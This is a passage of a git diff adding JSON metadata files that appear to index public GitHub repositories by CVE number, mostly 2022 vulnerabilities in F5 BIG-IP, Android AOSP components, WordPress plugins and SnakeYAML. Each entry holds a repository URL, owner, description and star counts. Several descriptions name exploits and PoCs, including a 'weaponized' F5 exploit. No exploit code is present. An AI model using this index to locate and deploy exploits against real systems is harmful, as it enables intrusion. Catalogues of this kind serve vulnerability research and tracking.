"name": "tippa-my-tongue", + "full_name": "j-baines\/tippa-my-tongue", + "owner": { + "login": "j-baines", + "id": 113205286, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113205286?v=4", + "html_url": "https:\/\/github.com\/j-baines", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/j-baines\/tippa-my-tongue", + "description": "F5 BIG-IP Exploit Using CVE-2022-1388 and CVE-2022-41800", + "fork": false, + "created_at": "2023-04-12T20:46:03Z", + "updated_at": "2023-04-14T17:24:44Z", + "pushed_at": "2023-04-12T21:03:44Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-1388", + "cve-2022-41800" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 665620716, + "name": "F5-BIG-IP-Remote-Code-Execution-Vulnerability-CVE-2022-1388-A-Case-Study", + "full_name": "SudeepaShiranthaka\/F5-BIG-IP-Remote-Code-Execution-Vulnerability-CVE-2022-1388-A-Case-Study", + "owner": { + "login": "SudeepaShiranthaka", + "id": 58376903, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58376903?v=4", + "html_url": "https:\/\/github.com\/SudeepaShiranthaka", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SudeepaShiranthaka\/F5-BIG-IP-Remote-Code-Execution-Vulnerability-CVE-2022-1388-A-Case-Study", + "description": "F5-BIG-IP Remote Code Execution Vulnerability CVE-2022-1388: A Case Study", + "fork": false, + "created_at": "2023-07-12T15:53:33Z", + "updated_at": "2023-07-12T15:53:34Z", + "pushed_at": "2023-07-12T15:54:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 673481578, + "name": "refresh", + "full_name": "battleofthebots\/refresh", + "owner": { + "login": "battleofthebots", + "id": 122462368, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122462368?v=4", + "html_url": "https:\/\/github.com\/battleofthebots", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/battleofthebots\/refresh", + "description": "CVE-2022-1388 - F5 Router RCE Replica", + "fork": false, + "created_at": "2023-08-01T18:12:52Z", + "updated_at": "2023-10-16T10:21:39Z", + "pushed_at": "2023-10-11T22:07:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 738523749, + "name": "CVE-2022-1388-exploit", + "full_name": "nvk0x\/CVE-2022-1388-exploit", + "owner": { + "login": "nvk0x", + "id": 22233431, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22233431?v=4", + "html_url": "https:\/\/github.com\/nvk0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nvk0x\/CVE-2022-1388-exploit", + "description": "exploit poc", + "fork": false, + "created_at": "2024-01-03T12:28:06Z", + "updated_at": "2024-06-02T06:33:07Z", + "pushed_at": "2024-01-03T12:28:54Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 741149336, + "name": "CVE-2022-1388", + "full_name": "nico989\/CVE-2022-1388", + "owner": { + "login": "nico989", + "id": 55981787, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55981787?v=4", + "html_url": "https:\/\/github.com\/nico989", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nico989\/CVE-2022-1388", + "description": "PoC for CVE-2022-1388 affecting F5 BIG-IP.", + "fork": false, + "created_at": "2024-01-09T19:52:36Z", + "updated_at": "2024-03-23T10:44:09Z", + "pushed_at": "2024-01-12T22:42:14Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 793842153, + "name": "CVE-2022-1388", + "full_name": "gotr00t0day\/CVE-2022-1388", + "owner": { + "login": "gotr00t0day", + "id": 48636787, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48636787?v=4", + "html_url": "https:\/\/github.com\/gotr00t0day", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gotr00t0day\/CVE-2022-1388", + "description": "A remote code execution vulnerability exists in the iControl REST API feature of F5's BIG-IP product. An unauthenticated, remote attacker can exploit this to bypass authentication and execute arbitrary commands with root privileges.", + "fork": false, + "created_at": "2024-04-30T01:10:05Z", + "updated_at": "2024-11-08T09:40:55Z", + "pushed_at": "2024-04-30T01:12:19Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 856503073, + "name": "CVE-2022-1388", + "full_name": "impost0r\/CVE-2022-1388", + "owner": { + "login": "impost0r", + "id": 16020669, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16020669?v=4", + "html_url": "https:\/\/github.com\/impost0r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/impost0r\/CVE-2022-1388", + "description": "Old weaponized CVE-2022-1388 exploit.", + "fork": false, + "created_at": "2024-09-12T17:25:23Z", + "updated_at": "2024-09-12T17:27:23Z", + "pushed_at": "2024-09-12T17:27:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 892945436, + "name": "cve-2022-1388-poc", + "full_name": "XiaomingX\/cve-2022-1388-poc", + "owner": { + "login": "XiaomingX", + "id": 5387930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5387930?v=4", + "html_url": "https:\/\/github.com\/XiaomingX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XiaomingX\/cve-2022-1388-poc", + "description": "CVE-2022-1388 是一个影响 F5 BIG-IP 应用交付控制器(ADC)的严重漏洞。以下是对其原理和危害的详细介绍:", + "fork": false, + "created_at": "2024-11-23T05:39:26Z", + "updated_at": "2024-12-08T18:36:57Z", + "pushed_at": "2024-11-23T05:41:08Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "exp", + "poc" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 } ] \ No newline at end of file diff --git a/2022/CVE-2022-1421.json b/2022/CVE-2022-1421.json new file mode 100644 index 0000000000..c0c505e4f7 --- /dev/null +++ b/2022/CVE-2022-1421.json @@ -0,0 +1,33 @@ +[ + { + "id": 513177414, + "name": "CVE-2022-1421", + "full_name": "nb1b3k\/CVE-2022-1421", + "owner": { + "login": "nb1b3k", + "id": 35418661, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35418661?v=4", + "html_url": "https:\/\/github.com\/nb1b3k", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nb1b3k\/CVE-2022-1421", + "description": null, + "fork": false, + "created_at": "2022-07-12T14:34:48Z", + "updated_at": "2024-01-09T09:55:01Z", + "pushed_at": "2022-11-01T12:44:36Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-1442.json b/2022/CVE-2022-1442.json new file mode 100644 index 0000000000..f334266e0d --- /dev/null +++ b/2022/CVE-2022-1442.json @@ -0,0 +1,33 @@ +[ + { + "id": 674189234, + "name": "CVE-2022-1442", + "full_name": "RandomRobbieBF\/CVE-2022-1442", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2022-1442", + "description": "WordPress Plugin Metform <= 2.1.3 - Improper Access Control Allowing Unauthenticated Sensitive Information Disclosure", + "fork": false, + "created_at": "2023-08-03T10:47:28Z", + "updated_at": "2024-08-12T20:32:20Z", + "pushed_at": "2023-08-03T10:49:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-1471.json b/2022/CVE-2022-1471.json new file mode 100644 index 0000000000..8f893a5a73 --- /dev/null +++ b/2022/CVE-2022-1471.json @@ -0,0 +1,64 @@ +[ + { + "id": 608740009, + "name": "SnakeYAML-CVE-2022-1471-POC", + "full_name": "1fabunicorn\/SnakeYAML-CVE-2022-1471-POC", + "owner": { + "login": "1fabunicorn", + "id": 19752126, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19752126?v=4", + "html_url": "https:\/\/github.com\/1fabunicorn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/1fabunicorn\/SnakeYAML-CVE-2022-1471-POC", + "description": "Code for veracode blog", + "fork": false, + "created_at": "2023-03-02T16:33:02Z", + "updated_at": "2024-07-19T18:50:15Z", + "pushed_at": "2023-03-02T16:50:59Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 637852784, + "name": "snakeyaml_cve_poc", + "full_name": "falconkei\/snakeyaml_cve_poc", + "owner": { + "login": "falconkei", + "id": 19479860, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19479860?v=4", + "html_url": "https:\/\/github.com\/falconkei", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/falconkei\/snakeyaml_cve_poc", + "description": "SnakeYAML-CVE-2022-1471-POC", + "fork": false, + "created_at": "2023-05-08T14:46:22Z", + "updated_at": "2024-03-11T18:38:49Z", + "pushed_at": "2023-12-24T13:26:54Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-14733.json b/2022/CVE-2022-14733.json new file mode 100644 index 0000000000..68202d1fab --- /dev/null +++ b/2022/CVE-2022-14733.json @@ -0,0 +1,33 @@ +[ + { + "id": 580686451, + "name": "CVE-2022-14733", + "full_name": "hkzck\/CVE-2022-14733", + "owner": { + "login": "hkzck", + "id": 48936012, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48936012?v=4", + "html_url": "https:\/\/github.com\/hkzck", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hkzck\/CVE-2022-14733", + "description": null, + "fork": false, + "created_at": "2022-12-21T07:28:12Z", + "updated_at": "2022-12-21T07:28:12Z", + "pushed_at": "2022-12-21T07:30:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-1565.json b/2022/CVE-2022-1565.json new file mode 100644 index 0000000000..a1b41a0094 --- /dev/null +++ b/2022/CVE-2022-1565.json @@ -0,0 +1,33 @@ +[ + { + "id": 818221073, + "name": "CVE-2022-1565", + "full_name": "phanthibichtram12\/CVE-2022-1565", + "owner": { + "login": "phanthibichtram12", + "id": 95855503, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95855503?v=4", + "html_url": "https:\/\/github.com\/phanthibichtram12", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/phanthibichtram12\/CVE-2022-1565", + "description": null, + "fork": false, + "created_at": "2024-06-21T11:08:26Z", + "updated_at": "2024-06-21T11:10:04Z", + "pushed_at": "2024-06-21T11:10:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-1609.json b/2022/CVE-2022-1609.json index abf832e0db..e9fe8f3d4f 100644 --- a/2022/CVE-2022-1609.json +++ b/2022/CVE-2022-1609.json @@ -91,5 +91,36 @@ "watchers": 3, "score": 0, "subscribers_count": 1 + }, + { + "id": 631257182, + "name": "cve-2022-1609-exploit", + "full_name": "w4r3s\/cve-2022-1609-exploit", + "owner": { + "login": "w4r3s", + "id": 119853210, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119853210?v=4", + "html_url": "https:\/\/github.com\/w4r3s", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/w4r3s\/cve-2022-1609-exploit", + "description": "Exploit for CVE-2022-1609 WordPress Weblizar Backdoor.", + "fork": false, + "created_at": "2023-04-22T12:51:09Z", + "updated_at": "2023-07-05T12:08:37Z", + "pushed_at": "2023-04-22T12:51:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 } ] \ No newline at end of file diff --git a/2022/CVE-2022-1679.json b/2022/CVE-2022-1679.json new file mode 100644 index 0000000000..3782081379 --- /dev/null +++ b/2022/CVE-2022-1679.json @@ -0,0 +1,64 @@ +[ + { + "id": 557313564, + "name": "-Detection-and-Mitigation-for-CVE-2022-1679", + "full_name": "EkamSinghWalia\/-Detection-and-Mitigation-for-CVE-2022-1679", + "owner": { + "login": "EkamSinghWalia", + "id": 106553324, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106553324?v=4", + "html_url": "https:\/\/github.com\/EkamSinghWalia", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EkamSinghWalia\/-Detection-and-Mitigation-for-CVE-2022-1679", + "description": null, + "fork": false, + "created_at": "2022-10-25T13:15:20Z", + "updated_at": "2022-11-11T16:23:49Z", + "pushed_at": "2022-10-25T13:17:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 690703239, + "name": "Detection-and-Mitigation-for-CVE-2022-1679", + "full_name": "ov3rwatch\/Detection-and-Mitigation-for-CVE-2022-1679", + "owner": { + "login": "ov3rwatch", + "id": 23441286, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23441286?v=4", + "html_url": "https:\/\/github.com\/ov3rwatch", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ov3rwatch\/Detection-and-Mitigation-for-CVE-2022-1679", + "description": null, + "fork": false, + "created_at": "2023-09-12T17:47:01Z", + "updated_at": "2023-09-12T17:48:39Z", + "pushed_at": "2023-09-12T17:48:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-1802.json b/2022/CVE-2022-1802.json new file mode 100644 index 0000000000..073d488950 --- /dev/null +++ b/2022/CVE-2022-1802.json @@ -0,0 +1,33 @@ +[ + { + "id": 526810658, + "name": "CVE-2022-1802", + "full_name": "mistymntncop\/CVE-2022-1802", + "owner": { + "login": "mistymntncop", + "id": 105329747, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105329747?v=4", + "html_url": "https:\/\/github.com\/mistymntncop", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mistymntncop\/CVE-2022-1802", + "description": null, + "fork": false, + "created_at": "2022-08-20T03:01:30Z", + "updated_at": "2024-10-20T03:46:31Z", + "pushed_at": "2023-02-20T23:29:21Z", + "stargazers_count": 153, + "watchers_count": 153, + "has_discussions": false, + "forks_count": 32, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 32, + "watchers": 153, + "score": 0, + "subscribers_count": 12 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20007.json b/2022/CVE-2022-20007.json index ae5dc3ecd8..a144b6580c 100644 --- a/2022/CVE-2022-20007.json +++ b/2022/CVE-2022-20007.json @@ -29,5 +29,36 @@ "watchers": 1, "score": 0, "subscribers_count": 2 + }, + { + "id": 529194635, + "name": "frameworks_base_AOSP10_r33_CVE-2022-20007", + "full_name": "pazhanivel07\/frameworks_base_AOSP10_r33_CVE-2022-20007", + "owner": { + "login": "pazhanivel07", + "id": 97434034, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97434034?v=4", + "html_url": "https:\/\/github.com\/pazhanivel07", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pazhanivel07\/frameworks_base_AOSP10_r33_CVE-2022-20007", + "description": null, + "fork": false, + "created_at": "2022-08-26T09:25:36Z", + "updated_at": "2023-03-27T01:17:22Z", + "pushed_at": "2022-08-26T09:37:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 } ] \ No newline at end of file diff --git a/2022/CVE-2022-20009.json b/2022/CVE-2022-20009.json new file mode 100644 index 0000000000..105e50d990 --- /dev/null +++ b/2022/CVE-2022-20009.json @@ -0,0 +1,33 @@ +[ + { + "id": 675254019, + "name": "android-gadget", + "full_name": "szymonh\/android-gadget", + "owner": { + "login": "szymonh", + "id": 12231135, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12231135?v=4", + "html_url": "https:\/\/github.com\/szymonh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/szymonh\/android-gadget", + "description": "CVE-2022-20009 - Description and sample exploit for Android USB Gadgets", + "fork": false, + "created_at": "2023-08-06T10:01:32Z", + "updated_at": "2024-11-30T08:30:37Z", + "pushed_at": "2023-08-06T11:03:21Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20120.json b/2022/CVE-2022-20120.json new file mode 100644 index 0000000000..b74bfd5e76 --- /dev/null +++ b/2022/CVE-2022-20120.json @@ -0,0 +1,33 @@ +[ + { + "id": 905192929, + "name": "ABL_ROP", + "full_name": "boredpentester\/ABL_ROP", + "owner": { + "login": "boredpentester", + "id": 47897567, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47897567?v=4", + "html_url": "https:\/\/github.com\/boredpentester", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/boredpentester\/ABL_ROP", + "description": "Experimenting with CVE-2022-20120 (Pixel Bootloader \/ ABL) using Unicorn, derived from eShard's emulator at https:\/\/github.com\/eshard\/pixel6-boot\/blob\/main\/run_abl_public.ipynb", + "fork": false, + "created_at": "2024-12-18T10:44:34Z", + "updated_at": "2024-12-19T01:13:59Z", + "pushed_at": "2024-12-18T11:00:38Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20126.json b/2022/CVE-2022-20126.json new file mode 100644 index 0000000000..efaf6bee94 --- /dev/null +++ b/2022/CVE-2022-20126.json @@ -0,0 +1,33 @@ +[ + { + "id": 534168096, + "name": "packages_apps_Bluetooth_AOSP10_r33_CVE-2022-20126", + "full_name": "Trinadh465\/packages_apps_Bluetooth_AOSP10_r33_CVE-2022-20126", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/packages_apps_Bluetooth_AOSP10_r33_CVE-2022-20126", + "description": null, + "fork": false, + "created_at": "2022-09-08T10:51:13Z", + "updated_at": "2022-10-11T12:56:48Z", + "pushed_at": "2022-09-08T10:56:34Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20128.json b/2022/CVE-2022-20128.json new file mode 100644 index 0000000000..022a573aa3 --- /dev/null +++ b/2022/CVE-2022-20128.json @@ -0,0 +1,33 @@ +[ + { + "id": 534637282, + "name": "CVE-2022-20128", + "full_name": "irsl\/CVE-2022-20128", + "owner": { + "login": "irsl", + "id": 6357121, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6357121?v=4", + "html_url": "https:\/\/github.com\/irsl", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/irsl\/CVE-2022-20128", + "description": "Android Debug Bridge (adb) was vulnerable to directory traversal attacks that could have been mounted by rogue\/compromised adb daemons during an adb pull operation.", + "fork": false, + "created_at": "2022-09-09T12:40:21Z", + "updated_at": "2024-09-04T07:29:05Z", + "pushed_at": "2022-09-09T12:42:19Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20130.json b/2022/CVE-2022-20130.json new file mode 100644 index 0000000000..fec178d0a9 --- /dev/null +++ b/2022/CVE-2022-20130.json @@ -0,0 +1,33 @@ +[ + { + "id": 509461641, + "name": "external_aac_AOSP10_r33_CVE-2022-20130", + "full_name": "Satheesh575555\/external_aac_AOSP10_r33_CVE-2022-20130", + "owner": { + "login": "Satheesh575555", + "id": 102573923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4", + "html_url": "https:\/\/github.com\/Satheesh575555", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Satheesh575555\/external_aac_AOSP10_r33_CVE-2022-20130", + "description": null, + "fork": false, + "created_at": "2022-07-01T13:16:14Z", + "updated_at": "2022-07-01T13:25:04Z", + "pushed_at": "2022-07-01T13:25:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20138.json b/2022/CVE-2022-20138.json new file mode 100644 index 0000000000..2707f70b19 --- /dev/null +++ b/2022/CVE-2022-20138.json @@ -0,0 +1,64 @@ +[ + { + "id": 515158255, + "name": "ShaikUsaf-frameworks_base_AOSP10_r33_CVE-2022-20138", + "full_name": "ShaikUsaf\/ShaikUsaf-frameworks_base_AOSP10_r33_CVE-2022-20138", + "owner": { + "login": "ShaikUsaf", + "id": 100413972, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100413972?v=4", + "html_url": "https:\/\/github.com\/ShaikUsaf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ShaikUsaf\/ShaikUsaf-frameworks_base_AOSP10_r33_CVE-2022-20138", + "description": null, + "fork": false, + "created_at": "2022-07-18T11:36:28Z", + "updated_at": "2022-07-18T11:38:43Z", + "pushed_at": "2022-07-18T11:39:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 563392111, + "name": "frameworks_base_AOSP10_r33_CVE-2022-20138", + "full_name": "Trinadh465\/frameworks_base_AOSP10_r33_CVE-2022-20138", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_base_AOSP10_r33_CVE-2022-20138", + "description": null, + "fork": false, + "created_at": "2022-11-08T14:16:45Z", + "updated_at": "2023-03-27T01:35:23Z", + "pushed_at": "2022-11-08T14:26:27Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20140.json b/2022/CVE-2022-20140.json new file mode 100644 index 0000000000..deb7cc45d4 --- /dev/null +++ b/2022/CVE-2022-20140.json @@ -0,0 +1,33 @@ +[ + { + "id": 778237386, + "name": "system_bt_aosp10_cve-2022-20140", + "full_name": "RenukaSelvar\/system_bt_aosp10_cve-2022-20140", + "owner": { + "login": "RenukaSelvar", + "id": 165150685, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/165150685?v=4", + "html_url": "https:\/\/github.com\/RenukaSelvar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RenukaSelvar\/system_bt_aosp10_cve-2022-20140", + "description": null, + "fork": false, + "created_at": "2024-03-27T10:45:21Z", + "updated_at": "2024-03-27T10:48:05Z", + "pushed_at": "2024-03-27T10:48:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20142.json b/2022/CVE-2022-20142.json new file mode 100644 index 0000000000..ecb6ea85c4 --- /dev/null +++ b/2022/CVE-2022-20142.json @@ -0,0 +1,64 @@ +[ + { + "id": 510346412, + "name": "frameworks_base_AOSP10_r33_CVE-2022-20142", + "full_name": "Satheesh575555\/frameworks_base_AOSP10_r33_CVE-2022-20142", + "owner": { + "login": "Satheesh575555", + "id": 102573923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4", + "html_url": "https:\/\/github.com\/Satheesh575555", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Satheesh575555\/frameworks_base_AOSP10_r33_CVE-2022-20142", + "description": null, + "fork": false, + "created_at": "2022-07-04T12:16:05Z", + "updated_at": "2023-03-27T01:20:35Z", + "pushed_at": "2022-07-04T12:21:52Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 529215266, + "name": "frameworks_base_AOSP10_r33_CVE-2022-20142", + "full_name": "pazhanivel07\/frameworks_base_AOSP10_r33_CVE-2022-20142", + "owner": { + "login": "pazhanivel07", + "id": 97434034, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97434034?v=4", + "html_url": "https:\/\/github.com\/pazhanivel07", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pazhanivel07\/frameworks_base_AOSP10_r33_CVE-2022-20142", + "description": null, + "fork": false, + "created_at": "2022-08-26T10:35:11Z", + "updated_at": "2023-03-27T01:20:22Z", + "pushed_at": "2022-08-26T10:42:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + 